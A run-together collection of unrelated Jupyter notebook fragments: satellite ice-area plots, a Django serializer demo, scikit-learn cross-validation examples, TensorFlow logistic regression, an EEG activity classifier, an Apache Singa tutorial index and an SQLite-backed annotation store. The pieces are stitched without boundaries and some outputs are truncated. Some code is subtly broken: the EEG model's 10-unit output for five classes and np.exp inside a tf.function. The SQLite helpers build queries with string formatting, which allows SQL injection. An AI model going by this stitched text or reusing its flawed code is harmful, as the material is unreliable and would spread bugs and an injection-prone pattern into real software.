df_modice ns_cols = [col for col in df.columns if '_ns' in col] ns_cols.remove('Greenland_ns') df_ns = df[ns_cols] df_ns ax = df_modice.plot( style='-o') ax.legend(bbox_to_anchor=(1.5,1.0)) ax.set(title="MODICE.v0.4 (1strike) by mascon", ylabel='MODICE area ($km^2$)' ) ax = df_ns.plot( style='-o') ax.legend(bbox_to_anchor=(1.5,1.0)) ax.set(title="MODICE.v0.4 (1strike) never_seen by mascon", ylabel='MODICE area ($km^2$)' )Deserialize# JSON string json_string = '{"title":"Create Snippet", "code": "def create():", "linenos": true, "language":"python","style":"monokai"}' json_string import json data = json.loads(json_string) data # Serializer -> Custom object from snippets.serializers import SnippetSerializer serializer = SnippetSerializer(data=data) print(serializer.is_valid()) # 새 Snippet객체를 생성 (Serializer.create()를 호출) new_snippet = serializer.save() new_snippet.title last_snippet = Snippet.objects.order_by('pk').last() last_snippet.title = 'Create Snippet' last_snippet.code = 'def create()' last_snippet.save() print(last_snippet.title) print(last_snippet.pk) import json update_json_string = '{"title": "Update Snippet", "code": "def update()"}' update_data = json.loads(update_json_string) update_data from snippets.serializers import SnippetSerializer serializer = 
SnippetSerializer(instance=last_snippet, data=update_data) serializer.is_valid() update_snippet = serializer.save() print(update_snippet.title) print(update_snippet.pk)Update Snippet 4Métodos de validação-cruzada Importimport numpy as npDadosdata_x = np.array([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9]) data_y = np.array([ 0, 0, 0, 0, 0, 1, 1, 1, 1, 1]) groups = np.array([1, 1, 1, 2, 2, 2, 3, 3, 3, 3]) assert data_x.shape[0] == data_y.shape[0] data = np.stack((data_x, data_y), axis=1) print("Tamanho do dataset:", data.shape[0]) print(data)Tamanho do dataset: 10 [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]]Holdoutfrom sklearn.model_selection import train_test_split train, valid = train_test_split(data, test_size=0.2, random_state=2 ) print('Treino \n', train) print('\nValidação \n', valid)Treino [[5 1] [0 0] [7 1] [2 0] [3 0] [6 1] [9 1] [8 1]] Validação [[4 0] [1 0]]Stratified Holdouttrain, valid = train_test_split(data, test_size=0.2, random_state=0, stratify=data_y) print('Treino \n', train) print('\nValidação \n', valid)Treino [[0 0] [6 1] [3 0] [9 1] [2 0] [5 1] [1 0] [7 1]] Validação [[4 0] [8 1]]K-foldfrom sklearn.model_selection import KFold kf = KFold(n_splits=5) iteration = 0 for train, valid in kf.split(data): train_ = data[train] valid_ = data[valid] print("it - ",iteration,"\nTrain\n", train_, "\nValid\n", valid_, "\n") iteration += 1it - 0 Train [[2 0] [3 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[0 0] [1 0]] it - 1 Train [[0 0] [1 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[2 0] [3 0]] it - 2 Train [[0 0] [1 0] [2 0] [3 0] [6 1] [7 1] [8 1] [9 1]] Valid [[4 0] [5 1]] it - 3 Train [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1] [8 1] [9 1]] Valid [[6 1] [7 1]] it - 4 Train [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1] [6 1] [7 1]] Valid [[8 1] [9 1]]Stratified K-foldfrom sklearn.model_selection import StratifiedKFold skf = StratifiedKFold(n_splits = 5, shuffle=True) iteration = 0 for train, valid in skf.split(data_x, data_y): train_ = data[train] valid_ = data[valid] print("it - ",iteration,"\nTrain\n", train_, "\nValid\n", valid_, "\n") iteration += 1it - 0 Train [[1 0] [2 0] [3 0] [4 0] [5 1] [7 1] [8 1] [9 1]] Valid [[0 0] [6 1]] it - 1 Train [[0 0] [1 0] [2 0] [4 0] [5 1] [6 1] [7 1] [9 1]] Valid [[3 0] [8 1]] it - 2 Train [[0 0] [1 0] [3 0] [4 0] [5 1] [6 1] [8 1] [9 1]] Valid [[2 0] [7 1]] it - 3 Train [[0 0] [1 0] [2 0] [3 0] [6 1] [7 1] [8 1] [9 1]] Valid [[4 0] [5 1]] it - 4 Train [[0 0] [2 0] [3 0] [4 0] [5 1] [6 1] [7 1] [8 1]] Valid [[1 0] [9 1]]Repeated K-foldfrom sklearn.model_selection import RepeatedKFold rkf = RepeatedKFold(n_splits=5, n_repeats=2, random_state=0) iteration = 0 for train, valid in rkf.split(data_x, data_y): train_ = data[train] valid_ = data[valid] print("it - ",iteration,"\nTrain\n", train_, "\nValid\n", valid_, "\n") iteration += 1it - 0 Train [[0 0] [1 0] [3 0] [4 0] [5 1] [6 1] [7 1] [9 1]] Valid [[2 0] [8 1]] it - 1 Train [[0 0] [1 0] [2 0] [3 0] [5 1] [6 1] [7 1] [8 1]] Valid [[4 0] [9 1]] it - 2 Train [[0 0] [2 0] [3 0] [4 0] [5 1] [7 1] [8 1] [9 1]] Valid [[1 0] [6 1]] it - 3 Train [[0 0] [1 0] [2 0] [4 0] [5 1] [6 1] [8 1] [9 1]] Valid [[3 0] [7 1]] it - 4 Train [[1 0] [2 0] [3 0] [4 0] [6 1] [7 1] [8 1] [9 1]] Valid [[0 0] [5 1]] it - 5 Train [[0 0] [1 0] [2 0] [4 0] [6 1] [7 1] [8 1] [9 1]] Valid [[3 0] [5 1]] it - 6 Train [[0 0] [3 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[1 0] [2 0]] it - 7 Train [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1] [6 1] [7 1]] Valid [[8 1] [9 1]] it - 8 Train [[1 0] [2 0] [3 0] [4 0] [5 1] [7 1] [8 1] [9 1]] 
Valid [[0 0] [6 1]] it - 9 Train [[0 0] [1 0] [2 0] [3 0] [5 1] [6 1] [8 1] [9 1]] Valid [[4 0] [7 1]]Group k-foldfrom sklearn.model_selection import GroupKFold gkf = GroupKFold(n_splits=3) iteration = 0 for train, valid in gkf.split(data_x, data_y, groups=groups): train_ = data[train] valid_ = data[valid] print("it - ",iteration,"\nTrain\n", train_, "\nValid\n", valid_, "\n") iteration += 1it - 0 Train [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1]] Valid [[6 1] [7 1] [8 1] [9 1]] it - 1 Train [[0 0] [1 0] [2 0] [6 1] [7 1] [8 1] [9 1]] Valid [[3 0] [4 0] [5 1]] it - 2 Train [[3 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[0 0] [1 0] [2 0]]Nested k-foldfrom sklearn.model_selection import StratifiedKFold outer_skf = StratifiedKFold(n_splits=5, shuffle=True, random_state=0) inner_skf = StratifiedKFold(n_splits=4, shuffle=True, random_state=0) iteration = 0 for train_outer, test in outer_skf.split(data_x, data_y): aux_data_inner_x = data_x[train_outer] aux_data_inner_y = data_y[train_outer] aux_data_inner = data[train_outer] test_ = data[test] #print("a\n",aux_data_inner_x, "b\n", test_) for train_inner, valid in inner_skf.split(aux_data_inner_x, aux_data_inner_y): train_ = aux_data_inner[train_inner] valid_ = aux_data_inner[valid] print("it - ",iteration,"\nTrain\n", train_, "\nValid\n", valid_, "\nTest\n", test_) iteration += 1it - 0 Train [[0 0] [2 0] [3 0] [7 1] [8 1] [9 1]] Valid [[4 0] [6 1]] Test [[1 0] [5 1]] it - 1 Train [[0 0] [2 0] [4 0] [6 1] [7 1] [9 1]] Valid [[3 0] [8 1]] Test [[1 0] [5 1]] it - 2 Train [[2 0] [3 0] [4 0] [6 1] [8 1] [9 1]] Valid [[0 0] [7 1]] Test [[1 0] [5 1]] it - 3 Train [[0 0] [3 0] [4 0] [6 1] [7 1] [8 1]] Valid [[2 0] [9 1]] Test [[1 0] [5 1]] it - 4 Train [[0 0] [1 0] [3 0] [6 1] [8 1] [9 1]] Valid [[4 0] [5 1]] Test [[2 0] [7 1]] it - 5 Train [[0 0] [1 0] [4 0] [5 1] [6 1] [9 1]] Valid [[3 0] [8 1]] Test [[2 0] [7 1]] it - 6 Train [[1 0] [3 0] [4 0] [5 1] [8 1] [9 1]] Valid [[0 0] [6 1]] Test [[2 0] [7 1]] it - 7 Train [[0 0] [3 0] [4 0] [5 1] [6 1] [8 1]] Valid [[1 0] [9 1]] Test [[2 0] [7 1]] it - 8 Train [[1 0] [2 0] [3 0] [7 1] [8 1] [9 1]] Valid [[4 0] [5 1]] Test [[0 0] [6 1]] it - 9 Train [[1 0] [2 0] [4 0] [5 1] [7 1] [9 1]] Vali[...]Monte Carlofrom sklearn.model_selection import ShuffleSplit shuffle = ShuffleSplit(n_splits=5, test_size=0.2, random_state=0) iteration = 0 for train, valid in shuffle.split(data): train_ = data[train] valid_ = data[valid] print("it - ",iteration,"\nTrain\n", train_, "\nValid\n", valid_, "\n") iteration += 1it - 0 Train [[4 0] [9 1] [1 0] [6 1] [7 1] [3 0] [0 0] [5 1]] Valid [[2 0] [8 1]] it - 1 Train [[1 0] [2 0] [9 1] [8 1] [0 0] [6 1] [7 1] [4 0]] Valid [[3 0] [5 1]] it - 2 Train [[8 1] [4 0] [5 1] [1 0] [0 0] [6 1] [9 1] [7 1]] Valid [[2 0] [3 0]] it - 3 Train [[9 1] [2 0] [7 1] [5 1] [8 1] [0 0] [3 0] [4 0]] Valid [[6 1] [1 0]] it - 4 Train [[7 1] [4 0] [1 0] [0 0] [6 1] [8 1] [9 1] [3 0]] Valid [[5 1] [2 0]]Stratified Monte Carlofrom sklearn.model_selection import StratifiedShuffleSplit sshuffle = StratifiedShuffleSplit(n_splits=5, test_size=0.2, random_state=0) iteration = 0 for train, valid in sshuffle.split(data_x, data_y): train_ = data[train] valid_ = data[valid] print("it - ",iteration,"\nTrain\n", train_, "\nValid\n", valid_, "\n") iteration += 1it - 0 Train [[0 0] [6 1] [3 0] [9 1] [2 0] [5 1] [1 0] [7 1]] Valid [[4 0] [8 1]] it - 1 Train [[9 1] [2 0] [7 1] [3 0] [6 1] [8 1] [1 0] [4 0]] Valid [[0 0] [5 1]] it - 2 Train [[8 1] [1 0] [7 1] [4 0] [9 1] [2 0] [0 0] [6 1]] Valid [[5 1] [3 0]] it - 3 Train [[2 
0] [6 1] [0 0] [5 1] [8 1] [3 0] [7 1] [1 0]] Valid [[4 0] [9 1]] it - 4 Train [[5 1] [2 0] [8 1] [4 0] [9 1] [3 0] [7 1] [1 0]] Valid [[0 0] [6 1]]Time Seriesfrom sklearn.model_selection import TimeSeriesSplit tscv = TimeSeriesSplit(n_splits=3) iteration = 0 for train, valid in tscv.split(data): train_ = data[train] valid_ = data[valid] print("it - ",iteration,"\nTrain\n", train_, "\nValid\n", valid_, "\n") iteration += 1it - 0 Train [[0 0] [1 0] [2 0] [3 0]] Valid [[4 0] [5 1]] it - 1 Train [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1]] Valid [[6 1] [7 1]] it - 2 Train [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1] [6 1] [7 1]] Valid [[8 1] [9 1]]Leave-P-Outfrom sklearn.model_selection import LeavePOut lpo = LeavePOut(p=2) iteration = 0 for train, valid in lpo.split(data): train_ = data[train] valid_ = data[valid] print("it - ",iteration,"\nTrain\n", train_, "\nValid\n", valid_, "\n") iteration += 1it - 0 Train [[2 0] [3 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[0 0] [1 0]] it - 1 Train [[1 0] [3 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[0 0] [2 0]] it - 2 Train [[1 0] [2 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[0 0] [3 0]] it - 3 Train [[1 0] [2 0] [3 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[0 0] [4 0]] it - 4 Train [[1 0] [2 0] [3 0] [4 0] [6 1] [7 1] [8 1] [9 1]] Valid [[0 0] [5 1]] it - 5 Train [[1 0] [2 0] [3 0] [4 0] [5 1] [7 1] [8 1] [9 1]] Valid [[0 0] [6 1]] it - 6 Train [[1 0] [2 0] [3 0] [4 0] [5 1] [6 1] [8 1] [9 1]] Valid [[0 0] [7 1]] it - 7 Train [[1 0] [2 0] [3 0] [4 0] [5 1] [6 1] [7 1] [9 1]] Valid [[0 0] [8 1]] it - 8 Train [[1 0] [2 0] [3 0] [4 0] [5 1] [6 1] [7 1] [8 1]] Valid [[0 0] [9 1]] it - 9 Train [[0 0] [3 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[1 0] [2 0]] it - 10 Train [[0[...]Leave-P-Group-Outfrom sklearn.model_selection import LeavePGroupsOut lpgo = LeavePGroupsOut(n_groups=2) iteration = 0 for train, valid in lpgo.split(data_x, data_y, groups=groups): train_ = data[train] valid_ = data[valid] print("it - ",iteration,"\nTrain\n", train_, "\nValid\n", valid_, "\n") iteration += 1it - 0 Train [[6 1] [7 1] [8 1] [9 1]] Valid [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1]] it - 1 Train [[3 0] [4 0] [5 1]] Valid [[0 0] [1 0] [2 0] [6 1] [7 1] [8 1] [9 1]] it - 2 Train [[0 0] [1 0] [2 0]] Valid [[3 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]]Leave-One-Outfrom sklearn.model_selection import LeaveOneOut loo = LeaveOneOut() iteration = 0 for train, valid in loo.split(data): train_ = data[train] valid_ = data[valid] print("it - ",iteration,"\nTrain\n", train_, "\nValid\n", valid_, "\n") iteration += 1it - 0 Train [[1 0] [2 0] [3 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[0 0]] it - 1 Train [[0 0] [2 0] [3 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[1 0]] it - 2 Train [[0 0] [1 0] [3 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[2 0]] it - 3 Train [[0 0] [1 0] [2 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[3 0]] it - 4 Train [[0 0] [1 0] [2 0] [3 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[4 0]] it - 5 Train [[0 0] [1 0] [2 0] [3 0] [4 0] [6 1] [7 1] [8 1] [9 1]] Valid [[5 1]] it - 6 Train [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1] [7 1] [8 1] [9 1]] Valid [[6 1]] it - 7 Train [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1] [6 1] [8 1] [9 1]] Valid [[7 1]] it - 8 Train [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1] [6 1] [7 1] [9 1]] Valid [[8 1]] it - 9 Train [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1] [6 1] [7 1] [8 1]] Valid [[9 1]]Leave-One-Group-Outfrom sklearn.model_selection import LeaveOneGroupOut logo = LeaveOneGroupOut() iteration = 0 for train, valid in logo.split(data_x, data_y, 
groups=groups): train_ = data[train] valid_ = data[valid] print("it - ",iteration,"\nTrain\n", train_, "\nValid\n", valid_, "\n") iteration += 1it - 0 Train [[3 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[0 0] [1 0] [2 0]] it - 1 Train [[0 0] [1 0] [2 0] [6 1] [7 1] [8 1] [9 1]] Valid [[3 0] [4 0] [5 1]] it - 2 Train [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1]] Valid [[6 1] [7 1] [8 1] [9 1]]xterm_rgb=[[x[0], np.array([int('0x'+x[1][:2],0),int('0x'+x[1][2:4],0),int('0x'+x[1][4:6],0)])] for x in CLUT]diff=[[[y[0],np.sqrt((x-y[1]).dot(x-y[1]))] for y in xterm_rgb] for x in rgbarr] closest=[sorted(x,key=lambda x : x[1])[0][0] for x in diff] closestListing 5.5 - Using one-dimensional logistic regressionimport numpy as np import tensorflow as tf import matplotlib.pyplot as plt import tensorflow.math as math DTYPE = tf.float32 learning_rate = 0.01 training_epochs = 1000 momentum = 0.0 @tf.function def sigmoid(x): return tf.convert_to_tensor(1. / (1. + np.exp(-x))) x1 = np.random.normal(-4, 2, 1000) x2 = np.random.normal(4, 2, 1000) xs = np.append(x1, x2) ys = np.asarray([0.] * len(x1) + [1.] * len(x2)) plt.scatter(xs, ys) X = tf.constant(xs, dtype=DTYPE, name='x') Y = tf.constant(ys, dtype=DTYPE, name='y') w = tf.Variable([0., 0.], name='parameter', dtype=DTYPE) w @tf.function def y_model(): return tf.sigmoid(w[1] * X + w[0]) @tf.function def cost(): return math.reduce_mean( -Y * math.log(y_model()) -(1 - Y) * math.log(1 - y_model()) ) train_op = tf.keras.optimizers.SGD(learning_rate=learning_rate, momentum=momentum) prev_err = 0 for epoch in range(training_epochs): train_op.minimize(cost, w) err, no = w.numpy() # if math.abs(prev_err - err) < 0.0001: # break prev_err = err w_val = w.numpy() w_val all_xs = np.linspace(-10, 10, 100) plt.plot(all_xs, math.sigmoid(all_xs * w_val[1] + w_val[0])) plt.scatter(xs, ys) plt.show()Apparently mean and sd of df_closed are 0 at this precision level!# loading in the validation data path = '/Users/asgnxt/mne-miniconda/mne_data/train_val_16/val_16/eyesclosed_val.feather' df_closed_val = feather.read_feather(path) path = '/Users/asgnxt/mne-miniconda/mne_data/train_val_16/val_16/eyesopen_val.feather' df_open_val = feather.read_feather(path) path = '/Users/asgnxt/mne-miniconda/mne_data/train_val_16/val_16/mathematic_val.feather' df_math_val = feather.read_feather(path) path = '/Users/asgnxt/mne-miniconda/mne_data/train_val_16/val_16/memory_val.feather' df_memory_val = feather.read_feather(path) path = '/Users/asgnxt/mne-miniconda/mne_data/train_val_16/val_16/music_val.feather' df_music_val = feather.read_feather(path) # determine the number of samples in each dataframe print(df_closed.shape) print(df_open.shape) print(df_math.shape) print(df_memory.shape) print(df_music.shape) print(df_closed_val.shape) print(df_open_val.shape) print(df_math_val.shape) print(df_memory_val.shape) print(df_music_val.shape)(7076, 30000) (7076, 30000) (7259, 30000) (7259, 30000) (7076, 30000) (854, 30000) (854, 30000) (854, 30000) (854, 30000) (915, 30000)The training data is either 7076 or 7259 rows x 30000 columns. Given there are 61 channels of EEG, there are 7076 / 61 = 116 / 119 distinct recordings of 300 sec each (100 Hz sampling).Imagining an EEG 'frame' of 61 x 61 (61 channels x 610 ms); each row can be thought of as a movie with ~492 frames. 
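As a minimal sketch of this frame view (assuming one recording has already been stacked into a (61, 30000) channels-by-samples NumPy array; the function name is illustrative, not part of the pipeline above):

import numpy as np

def recording_to_frames(recording, frame_len=61):
    # Split a (61, 30000) channels-x-samples array into ~491 full frames of shape (61, frame_len);
    # the few trailing samples that do not fill a frame are dropped.
    n_channels, n_samples = recording.shape
    n_frames = n_samples // frame_len
    trimmed = recording[:, :n_frames * frame_len]
    # reshape to (n_channels, n_frames, frame_len), then reorder to (n_frames, n_channels, frame_len)
    return trimmed.reshape(n_channels, n_frames, frame_len).transpose(1, 0, 2)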
Each activity has a training set of 492 x 116 or 492 x 119 frames of data from a subset of subjects and sessions# defining parameters for the model batch_size = 32 img_width = 61 img_height = 61 num_channels = 61 print(f'Number of channels: {num_channels}') # defining the number of samples num_samples = 30000 print(f'Number of samples: {num_samples}') # defining the number of frames num_frames = num_samples/num_channels print(f'image_size = 61 x 61') print(f'Number of images per row: {num_frames}') # defining the number of classes num_classes = 5 print(f'Number of classes: {num_classes}') # defining the number of epochs num_training_epochs = num_frames * 116 * num_classes print(f'num_training_epochs = {num_training_epochs.__round__()}') # create labels for each dataframe with float16 precision df_closed['label'] = 0 df_open['label'] = 1 df_math['label'] = 2 df_memory['label'] = 3 df_music['label'] = 4 df_closed_val['label'] = 0 df_open_val['label'] = 1 df_math_val['label'] = 2 df_memory_val['label'] = 3 df_music_val['label'] = 4 # force the labels to be float16 precision df_closed['label'] = df_closed['label'].astype('float16') df_open['label'] = df_open['label'].astype('float16') df_math['label'] = df_math['label'].astype('float16') df_memory['label'] = df_memory['label'].astype('float16') df_music['label'] = df_music['label'].astype('float16') df_closed_val['label'] = df_closed_val['label'].astype('float16') df_open_val['label'] = df_open_val['label'].astype('float16') df_math_val['label'] = df_math_val['label'].astype('float16') df_memory_val['label'] = df_memory_val['label'].astype('float16') df_music_val['label'] = df_music_val['label'].astype('float16') # ensure that the dataframes are correctly labeled df_music.head() # Creating lists from each dataframe, each list contains one frame of data list_df_closed = np.array_split(df_closed, 116) print(list_df_closed[0].shape) list_df_open = np.array_split(df_open, 116) print(list_df_open[0].shape) list_df_math = np.array_split(df_math, 119) print(list_df_math[0].shape) list_df_memory = np.array_split(df_memory, 119) print(list_df_memory[0].shape) list_df_music = np.array_split(df_music, 116) print(list_df_music[0].shape) list_df_closed_val = np.array_split(df_closed_val, 14) print(list_df_closed_val[0].shape) list_df_open_val = np.array_split(df_open_val, 14) print(list_df_open_val[0].shape) list_df_math_val = np.array_split(df_math_val, 14) print(list_df_math_val[0].shape) list_df_memory_val = np.array_split(df_memory_val, 14) print(list_df_memory_val[0].shape) list_df_music_val = np.array_split(df_music_val, 15) print(list_df_music_val[0].shape) # Create a training dataset with multiple sessions / subjects training_examples = [] for i in range(116): training_examples.append(list_df_closed[i]) training_examples.append(list_df_open[i]) training_examples.append(list_df_math[i]) training_examples.append(list_df_memory[i]) training_examples.append(list_df_music[i]) # Create a validation dataset with multiple sessions / subjects validation_examples = [] for i in range(14): validation_examples.append(list_df_closed_val[i]) validation_examples.append(list_df_open_val[i]) validation_examples.append(list_df_math_val[i]) validation_examples.append(list_df_memory_val[i]) validation_examples.append(list_df_music_val[i]) # defining parameters for the model batch_size = 32 img_width = 61 img_height = 61 target_size = (img_width, img_height) num_channels = 61 print(f'Number of channels: {num_channels}') # defining the number of samples num_samples = 
30000 print(f'Number of samples: {num_samples}') # defining the number of frames num_frames = num_samples/num_channels print(f'image_size = 61 x 61') print(f'Number of images per row: {num_frames}') # defining the number of classes num_classes = 5 print(f'Number of classes: {num_classes}') # defining the number of epochs num_training_epochs = num_frames * 116 * num_classes print(f'num_training_epochs = {num_training_epochs.__round__()}') # creating a single training dataframe training_examples = pd.concat(training_examples) print(training_examples.shape) # creating a single validation dataframe validation_examples = pd.concat(validation_examples) print(validation_examples.shape) # ensuring uniform dtype training_examples.dtypes # create a separate target dataframe target = training_examples.pop('label') print(target.shape) print(target.head()) dataset_ts = tf.convert_to_tensor(training_examples) # dataset_ts_batches = dataset_ts.shuffle(buffer_size=10000).batch_size=batch_size #not working # Create a model model = tf.keras.Sequential([ tf.keras.layers.Flatten(input_shape=(30000, 1)), tf.keras.layers.Dense(128, activation=tf.nn.relu), tf.keras.layers.Dropout(0.2), tf.keras.layers.Dense(10, activation=tf.nn.softmax) ]) # Compile the model model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy']) # Train the model model.fit(dataset_ts, target, epochs=3)Epoch 1/3 1106/1106 [==============================] - 10s 9ms/step - loss: 1.6855 - accuracy: 0.1988 Epoch 2/3 1106/1106 [==============================] - 10s 9ms/step - loss: 1.6507 - accuracy: 0.1983 Epoch 3/3 1106/1106 [==============================] - 10s 9ms/step - loss: 1.6339 - accuracy: 0.1971Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements; and to You under the Apache License, Version 2.0. ![Apache Singa](http://singa.apache.org/en/_static/singa.png) Welcome to this tutorial for Apache Incubator-singa using Jupyter Notebook.Please install [PySINGA](http://singa.apache.org/en/docs/installation.htmlinstall-pysinga) before running these tutorials.1. [Regression](../en/docs/notebook/regression.ipynb )2. [MLP Tutorial](../en/docs/notebook/mlp.ipynb)3. [RBM Tutorial](../en/docs/notebook/rbm.ipynb)To learn more about Jupyter, please check [IPython in Depth](https://www.youtube.com/watch?v=xe_ATRmw0KM).If you want to use PySINGA and jupyter notebooks in virtual environment, please use conda virtual environment and install the following extension. 
Then you can select the kernel of the virtual environment in the browser.conda install nb_conda_kernelStorage#export import os import json import sqlite3 import copy from pathlib import Path from collections.abc import MutableMappingProject Structure setupjust to folders, first containing object (e.g images) to annotate and second foldercontains annotation data/results.#export def setup_project_paths(project_path:Path, image_dir='pics', label_dir=None): assert project_path.exists(), "Project path should point to " \ "existing directory" assert project_path.is_dir(), "Project path should point to " \ "existing directory" im_dir = Path(project_path, image_dir) results_dir = Path(project_path, 'results') results_dir.mkdir(parents=True, exist_ok=True) annotation_file_path = Path(results_dir, 'annotations.json') project_paths = (im_dir, annotation_file_path) if label_dir is not None: project_paths += (Path(project_path, label_dir),) return project_paths test_proj_path = Path('../data/test') setup_project_paths(test_proj_path) test_proj_path = Path('../data/test') setup_project_paths(test_proj_path, image_dir='ims', label_dir='labels') #export def get_image_list_from_folder(image_dir, strip_path=False): ''' Scans to construct list of existing images as objects ''' path_list = [Path(image_dir, f) for f in os.listdir(image_dir) if os.path.isfile(os.path.join(image_dir, f))] if strip_path: path_list = [p.name for p in path_list] return path_list get_image_list_from_folder('../data/mock/pics') get_image_list_from_folder('../data/mock/pics', strip_path=True)Generic Storage for Annotationskey values store- key, object_id / file_name- value json blob containing annotation#export class AnnotationStorage(MutableMapping): def __init__(self, im_paths): self.mapping = {} self.update({p.name: None for p in im_paths}) def __getitem__(self, key): return self.mapping[key] def __delitem__(self, key): if key in self: del self.mapping[key] def __setitem__(self, key, value): self.mapping[key] = value def __iter__(self): return iter(self.mapping) def __len__(self): return len(self.mapping) def __repr__(self): return f"{type(self).__name__}({self.mapping})" def save(self, file_name): with open(file_name, 'w', encoding='utf-8') as f: json.dump(self.mapping, f, ensure_ascii=False, sort_keys = True, indent=4) def load(self, file_name): with open(file_name) as data_file: self.mapping = json.load(data_file) def to_dict(self, only_annotated=True): if only_annotated: return {k: copy.deepcopy(v) for k, v in self.mapping.items() if v} else: return copy.deepcopy(self.mapping) im_paths = [Path('some/path', f) for f in ['name1', 'name2', 'name3']] storage = AnnotationStorage(im_paths) storage storage['name5'] = {'x': 5, 'y': 3, 'width': 7, 'height': 1} test_eq(storage['name5'], {'x': 5, 'y': 3, 'width': 7, 'height': 1}) len_before = len(storage) storage.pop('name1') test_eq(len(storage), len_before - 1) storage.to_dict() storage.to_dict(only_annotated=False) storage.save('/tmp/ttest.json') storage_from_file = AnnotationStorage([]) storage_from_file.load('/tmp/ttest.json') test_eq(storage, storage_from_file) storage test_eq(storage.get('name8', {'dict':'obj'}), {'dict':'obj'})DB backed storage- Changes in annotation should be tracked in db.- db - sqlite memory / disk, how to sync so that race conditons are avoided? - remote db (postgres, mysql etc.) 
with sqlalchemy layer write sqlite functions- init db- write json + timestamp to db BUT only if json has changed!- iterate over db- iterate over values with latest timestamp- get all history for key- allow for metadata?- check how sqlite write locks workimport sqlite3 #export def _list_tables(conn): query = """ SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'; """ c = conn.cursor() return c.execute(query).fetchall()```sqlDROP TABLE suppliers;CREATE TABLE suppliers ( supplier_id INTEGER PRIMARY KEY, supplier_name TEXT NOT NULL, group_id INTEGER NOT NULL, FOREIGN KEY (group_id) REFERENCES supplier_groups (group_id) );```conn = sqlite3.connect(":memory:") #export def _create_tables(conn): c = conn.cursor() query = """ CREATE TABLE IF NOT EXISTS data (objectID TEXT, timestamp DATETIME DEFAULT(STRFTIME('%Y-%m-%d %H:%M:%f', 'NOW')), data JSON, author TEXT, PRIMARY KEY (objectId, timestamp) ); """ c.execute(query) query = """ CREATE TABLE IF NOT EXISTS objects (objectID TEXT, orderID INTEGER PRIMARY KEY AUTOINCREMENT ) """ c.execute(query) conn.commit() #export def _list_table(conn, table_name='data', latest=True): if latest: query = """ SELECT * from {} GROUP BY objectID ORDER BY timestamp """.format(table_name) else: query = """ SELECT * from {} """.format(table_name) c = conn.cursor() return c.execute(query).fetchall() _create_tables(conn) _list_tables(conn)SQL helper functionsis needed for consistant iteration order#export def _get_order_id(conn, object_id, table_name='objects'): query = """ SELECT orderID from {} WHERE objectID = '{}' """.format(table_name, object_id) c = conn.cursor() res = c.execute(query).fetchone() if res is not None: return res[0] _get_order_id(conn, 'doesnt exist') #export def _create_order_id(conn, object_id, table_name='objects'): order_id = _get_order_id(conn, object_id, table_name=table_name) if order_id: return order_id query = """ INSERT INTO {}('objectID') VALUES('{}') """.format(table_name, object_id) c = conn.cursor() res = c.execute(query) return _get_order_id(conn, object_id, table_name=table_name) _create_order_id(conn, 'lala') _create_order_id(conn, 'lala') _create_order_id(conn, 'lala2') query = """ SELECT * from objects """ c = conn.cursor() res = c.execute(query).fetchall() res #export def _get(conn, object_id, table_name='data'): query = """ SELECT data FROM {} WHERE objectID = '{}' GROUP BY objectID ORDER BY timestamp """.format(table_name, object_id) c = conn.cursor() res = c.execute(query).fetchone() if res is not None: return json.loads(res[0]) #export def _get_object_id_at_pos(conn, pos, table_name='objects'): query = """ SELECT objectID FROM {} ORDER BY orderID LIMIT {}, 1 """.format(table_name, pos) c = conn.cursor() res = c.execute(query).fetchone() if res is not None: return res[0] _get_object_id_at_pos(conn, 1) #export def _insert(conn, object_id, data: dict, table_name='data', author='author'): # insert if values have been changed last = _get(conn, object_id) # if last is None: _create_order_id(conn, object_id) if data == last: return c = conn.cursor() c.execute("insert into {}('objectID', 'author', 'data') values (?, ?, ?)".format(table_name), [object_id, author, json.dumps(data)]) conn.commit() _insert(conn, 'lala3', {'crazy': 44}) _insert(conn, 'lala2', {'crazy': 40}) import time time.sleep(0.1) _insert(conn, 'lala3', {'crazy': 44 + 5}) _insert(conn, 'lala2', {'crazy': 40 + 5}) _list_table(conn, latest=False) _list_table(conn) # insert existing is ignored _insert(conn, 'lala2', {'crazy': 40 + 5}) 
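The requirement list above also asks for the full history of a key; a minimal sketch in the same style as the helpers in this section (a hypothetical addition, not one of the exported functions):

def _get_history(conn, object_id, table_name='data'):
    # Return every stored (timestamp, annotation) pair for one objectID, oldest first.
    query = """
    SELECT timestamp, data FROM {}
    WHERE objectID = '{}'
    ORDER BY timestamp
    """.format(table_name, object_id)
    c = conn.cursor()
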